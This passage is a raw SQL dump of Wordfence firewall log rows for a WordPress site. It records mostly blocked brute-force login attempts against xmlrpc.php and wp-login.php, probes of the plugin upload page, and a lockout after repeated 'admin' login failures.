Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11746,0.000000,1631075511.130093,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11747,1631075512.990681,1631075512.914700,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11748,0.000000,1631075714.732705,'\0\0\0\0\0\0\0\0\0\0��6\'iX',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11749,0.000000,1631075719.738469,'\0\0\0\0\0\0\0\0\0\0���_nq',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11750,0.000000,1631076123.890796,'\0\0\0\0\0\0\0\0\0\0��3�8�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11751,0.000000,1631076142.633984,'\0\0\0\0\0\0\0\0\0\0����e',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11752,0.000000,1631076551.134405,'\0\0\0\0\0\0\0\0\0\0��+���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11753,0.000000,1631076573.837475,'\0\0\0\0\0\0\0\0\0\0��@�:�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11754,0.000000,1631077008.553720,'\0\0\0\0\0\0\0\0\0\0���;!�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11755,0.000000,1631077016.947902,'\0\0\0\0\0\0\0\0\0\0��#�1�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11756,0.000000,1631077436.679026,'\0\0\0\0\0\0\0\0\0\0���=�M',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11757,0.000000,1631077461.216813,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11758,0.000000,1631077892.288776,'\0\0\0\0\0\0\0\0\0\0���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11759,0.000000,1631077918.263806,'\0\0\0\0\0\0\0\0\0\0��zrL�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11760,0.000000,1631078321.066966,'\0\0\0\0\0\0\0\0\0\0��h�o�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11761,0.000000,1631078340.679901,'\0\0\0\0\0\0\0\0\0\0���#y�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11762,0.000000,1631078783.517123,'\0\0\0\0\0\0\0\0\0\0��k�i�',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(11763,0.000000,1631078799.540160,'\0\0\0\0\0\0\0\0\0\0��S�\0',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(11764,0.000000,1631079218.790161,'\0\0\0\0\0\0\0\0\0\0����}�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11765,0.000000,1631079239.572607,'\0\0\0\0\0\0\0\0\0\0��]Y��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11766,0.000000,1631079697.134748,'\0\0\0\0\0\0\0\0\0\0��D�D�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11767,0.000000,1631079699.789375,'\0\0\0\0\0\0\0\0\0\0��#�ޥ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11768,0.000000,1631080161.833689,'\0\0\0\0\0\0\0\0\0\0��Y�B�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11769,0.000000,1631080169.043095,'\0\0\0\0\0\0\0\0\0\0���h,5',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11770,0.000000,1631080605.647671,'\0\0\0\0\0\0\0\0\0\0�����9',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11771,0.000000,1631080623.842381,'\0\0\0\0\0\0\0\0\0\0��m�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11772,0.000000,1631081078.148103,'\0\0\0\0\0\0\0\0\0\0��gZ�j',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11773,0.000000,1631081127.197793,'\0\0\0\0\0\0\0\0\0\0��|(��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11774,0.000000,1631081576.809635,'\0\0\0\0\0\0\0\0\0\0���y��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11775,0.000000,1631081588.518114,'\0\0\0\0\0\0\0\0\0\0��3\rH�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11776,0.000000,1631082063.470291,'\0\0\0\0\0\0\0\0\0\0����s',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11777,0.000000,1631082074.803819,'\0\0\0\0\0\0\0\0\0\0����!p',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11778,0.000000,1631082531.619076,'\0\0\0\0\0\0\0\0\0\0��gQW',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11779,0.000000,1631082533.828581,'\0\0\0\0\0\0\0\0\0\0���M',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11780,0.000000,1631083015.167799,'\0\0\0\0\0\0\0\0\0\0���zaD',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11781,0.000000,1631083027.112876,'\0\0\0\0\0\0\0\0\0\0���A�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11782,0.000000,1631083525.432738,'\0\0\0\0\0\0\0\0\0\0���&V',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11783,0.000000,1631083538.048854,'\0\0\0\0\0\0\0\0\0\0���3�:',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11784,0.000000,1631084014.213320,'\0\0\0\0\0\0\0\0\0\0��h�+�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11785,0.000000,1631084022.999343,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11786,0.000000,1631084518.997775,'\0\0\0\0\0\0\0\0\0\0���[i�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11787,0.000000,1631084519.420409,'\0\0\0\0\0\0\0\0\0\0���)',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11788,0.000000,1631085001.854007,'\0\0\0\0\0\0\0\0\0\0��ś�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11789,0.000000,1631085026.653071,'\0\0\0\0\0\0\0\0\0\0���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11790,0.000000,1631085502.055210,'\0\0\0\0\0\0\0\0\0\0��gZ�[',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11791,0.000000,1631085521.819734,'\0\0\0\0\0\0\0\0\0\0��3KR',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11792,0.000000,1631086018.491121,'\0\0\0\0\0\0\0\0\0\0����F',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11793,0.000000,1631086029.806272,'\0\0\0\0\0\0\0\0\0\0���j#�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11794,0.000000,1631086566.387381,'\0\0\0\0\0\0\0\0\0\0���˰R',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11795,0.000000,1631087052.144273,'\0\0\0\0\0\0\0\0\0\0��3Q�x',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11796,0.000000,1631091398.025800,'\0\0\0\0\0\0\0\0\0\0���6�K',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11797,1631091399.412059,1631091399.335800,'\0\0\0\0\0\0\0\0\0\0���6�K',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11798,0.000000,1631096521.436051,'\0\0\0\0\0\0\0\0\0\0��Xc��',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11799,0.000000,1631098818.136674,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11800,0.000000,1631098819.416035,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11801,0.000000,1631098820.080483,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11802,0.000000,1631098820.964740,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11803,0.000000,1631098821.691411,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11804,0.000000,1631098822.510631,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11805,0.000000,1631098823.358474,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11806,0.000000,1631098824.298878,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11807,0.000000,1631098824.968188,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11808,0.000000,1631098825.776956,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11809,0.000000,1631098826.652121,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11810,0.000000,1631098827.538947,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11811,0.000000,1631098828.294425,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11812,0.000000,1631098828.980101,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11813,0.000000,1631098829.698309,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11814,0.000000,1631098830.587164,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,200,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(11815,0.000000,1631098831.603795,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,503,0,1,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'admin\'',NULL),(11816,1631098832.744467,1631098832.352000,'\0\0\0\0\0\0\0\0\0\0��h�$�',0,503,0,0,0,'https://www.bournesociety.org.uk//wp-login.php','https://www.bournesociety.org.uk//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'admin\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly93cC1sb2dpbi5waHA=\"}'),(11817,0.000000,1631102224.376809,'\0\0\0\0\0\0\0\0\0\0����r\r',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11818,1631102225.899670,1631102225.797200,'\0\0\0\0\0\0\0\0\0\0����r\r',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11819,0.000000,1631102265.296772,'\0\0\0\0\0\0\0\0\0\0���6�F',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11820,1631102266.634978,1631102266.552200,'\0\0\0\0\0\0\0\0\0\0���6�F',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11821,0.000000,1631103384.727990,'\0\0\0\0\0\0\0\0\0\0��^>�',0,200,0,1,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','loginFailValidUsername',NULL,NULL),(11822,0.000000,1631103999.490881,'\0\0\0\0\0\0\0\0\0\0��\\̆�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11823,0.000000,1631105005.877358,'\0\0\0\0\0\0\0\0\0\0���6�F',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11824,1631105007.382755,1631105007.223300,'\0\0\0\0\0\0\0\0\0\0���6�F',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11825,0.000000,1631105175.507055,'\0\0\0\0\0\0\0\0\0\0���6�=',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11826,1631105179.332915,1631105179.217500,'\0\0\0\0\0\0\0\0\0\0���6�=',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11827,0.000000,1631106180.062319,'\0\0\0\0\0\0\0\0\0\0��g�>',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11828,0.000000,1631106937.551990,'\0\0\0\0\0\0\0\0\0\0��Օg�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11829,0.000000,1631107669.130362,'\0\0\0\0\0\0\0\0\0\0��j)�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11830,0.000000,1631108426.101618,'\0\0\0\0\0\0\0\0\0\0���G�k',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11831,0.000000,1631109236.815016,'\0\0\0\0\0\0\0\0\0\0���yQ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11832,0.000000,1631110019.264642,'\0\0\0\0\0\0\0\0\0\0���\0�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11833,0.000000,1631110813.933003,'\0\0\0\0\0\0\0\0\0\0��/J�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11834,0.000000,1631111608.686312,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by 